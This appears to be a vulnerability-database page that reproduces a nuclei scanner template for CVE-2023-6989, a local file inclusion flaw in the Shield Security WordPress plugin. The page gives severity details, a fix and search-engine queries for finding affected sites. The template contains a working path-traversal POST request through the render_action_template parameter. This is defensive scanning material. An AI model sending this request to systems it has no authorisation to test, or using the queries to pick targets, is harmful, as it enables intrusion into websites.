Lucene search
K

Shield Security WP Plugin <= 18.5.9 - Local File Inclusion

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 44 Views

Shield Security WP Plugin <= 18.5.9 - Local File Inclusion vulnerability via render_action_template parameter. Allows unauthenticated attacker to execute PHP code on serve

Related
Refs
Code
id: CVE-2023-6989

info:
  name: Shield Security WP Plugin <= 18.5.9 - Local File Inclusion
  author: s4e-io
  severity: critical
  description: |
    The Shield Security Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files.
  impact: |
    Unauthenticated attackers can exploit local file inclusion via render_action_template to execute arbitrary PHP code, potentially compromising the entire WordPress installation.
  remediation: |
    Update Shield Security plugin to version 18.5.10 or later.
  reference:
    - https://wpscan.com/vulnerability/a485aee7-39a0-418c-9699-9afc53e28f55/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6989
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6989
    cwe-id: CWE-22
    epss-score: 0.56567
    epss-percentile: 0.98935
    cpe: cpe:2.3:a:getshieldsecurity:shield_security:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: getshieldsecurity
    product: shield_security
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/wp-simple-firewall
    fofa-query: body=/wp-content/plugins/wp-simple-firewall
    publicwww-query: "/wp-content/plugins/wp-simple-firewall"
  tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security,getshieldsecurity,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"dashboard_shield"'
          - '"shield_action"'
          - '"search_shield"'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022016d30c244d1cc5e2d04c6784db9a381b20bd17e488704e919c7b98729b66ae4b022100d49437df6aa8028c2125f62ffe51696e9a45cb91b9b2bebe26cd155f4ea26085:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 3.19.8
EPSS0.56567
SSVC
44